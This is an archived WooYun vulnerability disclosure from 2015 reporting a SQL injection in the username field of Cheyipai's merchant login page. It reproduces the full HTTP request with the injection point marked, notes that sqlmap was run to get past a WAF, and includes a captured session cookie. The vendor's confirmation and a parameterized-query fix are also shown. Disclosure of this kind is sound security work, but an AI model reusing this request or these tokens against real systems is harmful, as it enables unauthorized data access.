当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144686

漏洞标题:车易拍某平台存在SQL注入漏洞(sqlmap绕waf)

相关厂商:cheyipai.com

漏洞作者: 路人甲

提交时间:2015-10-04 10:15

修复时间:2015-11-22 15:10

公开时间:2015-11-22 15:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-04: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

车易拍商户登录平台存在POST型sql注入,可以泄露商家信息

详细说明:

http://rz.cheyipai.com/
数据包如下,username为注入点

POST /Sh_Login.aspx?ReturnUrl=%2f%3f%25e5%25ad%2597%25e7%25ac%25a6%25e4%25b8%25b2%25e4%25b8%25ad%25e5%2590%25ab%25e6%259c%2589%25e9%259d%259e%25e6%25b3%2595%25e5%25ad%2597%25e7%25ac%25a6!%25e5%25b7%25b2%25e8%25ae%25b0%25e5%25bd%2595%25e4%25bd%25a0%25e7%259a%2584%25e8%25ae%25bf%25e9%2597%25aeip&%u5b57%u7b26%u4e32%u4e2d%u542b%u6709%u975e%u6cd5%u5b57%u7b26!%u5df2%u8bb0%u5f55%u4f60%u7684%u8bbf%u95eeip HTTP/1.1
Host: rz.cheyipai.com
Content-Length: 415
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://rz.cheyipai.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://rz.cheyipai.com/Sh_Login.aspx?ReturnUrl=%2f%3f%25e5%25ad%2597%25e7%25ac%25a6%25e4%25b8%25b2%25e4%25b8%25ad%25e5%2590%25ab%25e6%259c%2589%25e9%259d%259e%25e6%25b3%2595%25e5%25ad%2597%25e7%25ac%25a6!%25e5%25b7%25b2%25e8%25ae%25b0%25e5%25bd%2595%25e4%25bd%25a0%25e7%259a%2584%25e8%25ae%25bf%25e9%2597%25aeip&%e5%ad%97%e7%ac%a6%e4%b8%b2%e4%b8%ad%e5%90%ab%e6%9c%89%e9%9d%9e%e6%b3%95%e5%ad%97%e7%ac%a6!%e5%b7%b2%e8%ae%b0%e5%bd%95%e4%bd%a0%e7%9a%84%e8%ae%bf%e9%97%aeip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _
__VIEWSTATE=%2FwEPDwUJOTY5MzE0NjE1ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIQ2hlY2tCb3gFDEltYWdlQnV0dG9uMW3eKHbZaobUm8w%2FFVrR6WNWWJLkPCet6dKAxF%2FSud2a&__EVENTVALIDATION=%2FwEdAAXn6PqTZqTB4v%2BgPwlt7YXPKhoCyVdJtLIis5AgYZ%2FRYe4sciJO3Hoc68xTFtZGQEgQn8oIWOz%2BcbNQxNmg%2BKX06ZACrx5RZnllKSerU%2BIuKkmgM9PWP117dL%2BYT2MzLJEPc2s28utMXYtl13NMDpDZ&username=admin'&password=11&ImageButton1.x=26&ImageButton1.y=28


放到sqlmap跑一下看看

2015-10-03_212702.jpg


2015-10-03_212843.jpg


2015-10-03_212958.jpg


2015-10-03_213236.jpg


点到为止吧~

漏洞证明:

http://rz.cheyipai.com/
数据包如下,username为注入点

POST /Sh_Login.aspx?ReturnUrl=%2f%3f%25e5%25ad%2597%25e7%25ac%25a6%25e4%25b8%25b2%25e4%25b8%25ad%25e5%2590%25ab%25e6%259c%2589%25e9%259d%259e%25e6%25b3%2595%25e5%25ad%2597%25e7%25ac%25a6!%25e5%25b7%25b2%25e8%25ae%25b0%25e5%25bd%2595%25e4%25bd%25a0%25e7%259a%2584%25e8%25ae%25bf%25e9%2597%25aeip&%u5b57%u7b26%u4e32%u4e2d%u542b%u6709%u975e%u6cd5%u5b57%u7b26!%u5df2%u8bb0%u5f55%u4f60%u7684%u8bbf%u95eeip HTTP/1.1
Host: rz.cheyipai.com
Content-Length: 415
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://rz.cheyipai.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://rz.cheyipai.com/Sh_Login.aspx?ReturnUrl=%2f%3f%25e5%25ad%2597%25e7%25ac%25a6%25e4%25b8%25b2%25e4%25b8%25ad%25e5%2590%25ab%25e6%259c%2589%25e9%259d%259e%25e6%25b3%2595%25e5%25ad%2597%25e7%25ac%25a6!%25e5%25b7%25b2%25e8%25ae%25b0%25e5%25bd%2595%25e4%25bd%25a0%25e7%259a%2584%25e8%25ae%25bf%25e9%2597%25aeip&%e5%ad%97%e7%ac%a6%e4%b8%b2%e4%b8%ad%e5%90%ab%e6%9c%89%e9%9d%9e%e6%b3%95%e5%ad%97%e7%ac%a6!%e5%b7%b2%e8%ae%b0%e5%bd%95%e4%bd%a0%e7%9a%84%e8%ae%bf%e9%97%aeip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _adksh=1443420435305; _adkse=1802636bb006633554ef745b4fe8d1ab; _adksd=direct; _adksf=%26_u%3D0%26_a%3D0%26_k%3D0%26_s%3D0; .ASPXAUTH=D45EDD0F8375CF96E28499F4A86B7998B7C6312A752F0D53339B7332F4F4AAB54ADF8DF08F1D513E47A403790BAADB99414BC8FB6CEBA125610C5D5340D7070D415CD540D656C7F950EA16E80F569C7916EE42D8E8E537E7F95A5F296702125F3301F88232922D29C969A1FF27853AC1E2A46DBF8969130F436C5447FBF49232DB1D82E9FEBA796936CD3D8B5201EC1C8D147ACAA03D42B53D851B05EB17DC070E3EFAA88ADE65BE7F3CAD210D0B6C70333DF81FC9FFD7E0C57F8F4803DB52B24160D5169872B6336F96ACAF1081B2964D705858FCEEC4D2D048592CD54DA1EF903A8A1FF58F5CCEF663D17EECD1D3405B4CE9988E0A805A9DF428ED8D9559DC81791CA6FEAC59DF6A3296D74ABB3298AA24ADB3B0A4C5E64FE32D0904D4979989EE75D6E79ACCDBDAADA7C10176646FEAAA31710035DCDDD3F4E98C9A2136F52939439C4502BF1B3896DE5DB98F2347FA02B45239F267ECD26F8EC7121FB1A5A37DBE200BCC2DCB843092FC087E4F1722CF3FCEA0D22130B8C502B7300EB214E9A296DC0B1F9B85E0F73672599D83C594ABFD0CE5AF37CD314FF3656BB15440DE5D097B53CEB90C3607AE64D9434C9A9B111508E517CBF8B32155728932794D7EF6981B1966AC08BD684AEFC0E258378370C87CDA5C195782E875B0AC3F971D75DD825AA78CEE04E22F8458E04DD3A426BD066611AE3C2AF5CF658BC630F50828960CA9E37BD7F1AC600FBD370F86EA04A4727E5CA7D2F253C1474AEE922F39471C6172A250111EB6FA3A73D16E3A68872EEED6C144B04B23E19F66EDFA90B51CDBE0F9219AB9BDF007EC52EE1FFE2590184FEB34464E803722C20080A77FBA57E44A53E1BB6AE662CCE16F44646B2503A48593948EA46D7CAE0A21F08E18018D34BFBD853918B2A426083D7C2D68CED3F9F65191A2724782401F687258756E35AC22FDC54884A1CF5228583BE5A44C860A86951FC3ECF293C592A3EED558B28658EEDA59F2A4BE3E6428D0035A824DDAEB1EC8C28E2DAA839E013DF5CF8572E3F5CFCA598E2E316BBD64B989C702B9B59610B839076B802B25FD5E7D6BB110D574F5DA335F03539FC93D156464D3CC847150985DAB4AB076801FC4F2184BD5078A9EE73D7CE19FA46B169A02382C8C687064E9A5EAB86F31C676C226A4AB3733B5B8887D6D66229E2190DB509BDD5A11F7F16C606F05D5F989225060106CC26D7EA693FD6B94A77DCEFE4F251C0813BA8F5802A0D9BF73432CD7BCF2C0F918BC194FC56F718F1740C5A4B6BE36C279CA26275515AFEBAE8242FF3BCE05738D0D1AEE3521AAA55C5837841E59C3E85765C890BE693153864DA45A66AB3CCB93C1C83E9875B594B09398800D43DDB606F8C88026C7A7AF7477FCD8293A43135F0CEE97DBBFF634B1E529045726EECF3B5388724524EFE637289B1D4C03F9CED831C532486A46ACF2ACC1DBBCFB6DA7F0CF505802FEA78693EDA7BD068C7CC1EF0CC7C4D307C6B0E6D9E46C68CD807215980F901C26E5E702F9BFFA9DB586DCF7E4C6BD40D23C1AC1698247AEA4167302A3B62887699D71FE7A3DD3A65C1910AC7F590E1C54FBBE725345953333ADD830B4CC7904BAF194833AE8FE711A780D47F221CA80D53240892AD5A665A7FC2816D3B788C6734F60FECE6B7B9C65E8F7E298C06B07C296E2EF7DE79B408AB8AC3B; _adksc=1443875760231; _adksa=130025103.19157639.1443420435323.1443420435323.1443875760247; _adksb=1443877583798; Hm_lvt_11a0d0462736ffe428c2decbb869ef07=1443420435,1443875760; Hm_lpvt_11a0d0462736ffe428c2decbb869ef07=1443875816; Hm_lvt_c8752f1ed50be0798e275b8114081c89=1443420435,1443875760; Hm_lpvt_c8752f1ed50be0798e275b8114081c89=1443875816; ASP.NET_SessionId=kbngbihfx34dpju5540ggkdt
__VIEWSTATE=%2FwEPDwUJOTY5MzE0NjE1ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIQ2hlY2tCb3gFDEltYWdlQnV0dG9uMW3eKHbZaobUm8w%2FFVrR6WNWWJLkPCet6dKAxF%2FSud2a&__EVENTVALIDATION=%2FwEdAAXn6PqTZqTB4v%2BgPwlt7YXPKhoCyVdJtLIis5AgYZ%2FRYe4sciJO3Hoc68xTFtZGQEgQn8oIWOz%2BcbNQxNmg%2BKX06ZACrx5RZnllKSerU%2BIuKkmgM9PWP117dL%2BYT2MzLJEPc2s28utMXYtl13NMDpDZ&username=admin'&password=11&ImageButton1.x=26&ImageButton1.y=28


放到sqlmap跑一下看看

2015-10-03_212702.jpg


2015-10-03_212843.jpg


2015-10-03_212958.jpg


2015-10-03_213236.jpg


点到为止吧~

修复方案:

预编译参数化查询?

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-08 15:08

厂商回复:

感谢提交

最新状态:

暂无

漏洞评价:

评论